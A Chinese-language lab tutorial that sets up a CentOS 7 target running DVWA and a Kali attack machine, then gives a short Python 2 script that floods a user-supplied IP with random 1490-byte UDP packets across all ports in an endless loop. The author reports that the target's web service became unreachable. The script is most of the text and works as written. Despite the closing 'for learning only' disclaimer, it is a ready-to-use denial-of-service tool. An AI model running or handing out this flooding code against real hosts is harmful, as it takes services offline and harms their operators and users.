一、搭建环境
首先在虚拟机中搭建了centos7做为靶机,部署dvwa,端口80;然后部署了kali系统作为攻击机。
访问靶机dvwa,可以正常访问:
二、写攻击代码
在kali中用python写一段代码,用来访问靶机,轮询访问靶机所有端口,发送字节流,造成靶机端口被占用,实现ddos攻击的目的;
# -*- coding:utf-8 -*-
import sys
import os
import time
import socket
import random
#
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
#
os.system("clear")
os.system("figlet MY First DDos")
#
ip = raw_input("IP Target : ")
port = 1
#
time.sleep(3)
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "对 %s 攻击 %s 次 , port:%s"%(sent,ip,port)
if port == 65534:
port = 1
保存某目录,文件名 随便取,例如ddos_test.py
三、执行代码
python2 ddos_test.py
输入靶机ip地址,这里应该域名也可以,我没有试。
然后靶机的dvwa,就访问不了了
到此,DDos攻击就已经实现了。
因为写的是死循环,需要Ctrl+c结束攻击。
最后,参考代码用来学习,理解ddos原理,切勿做违法的事。
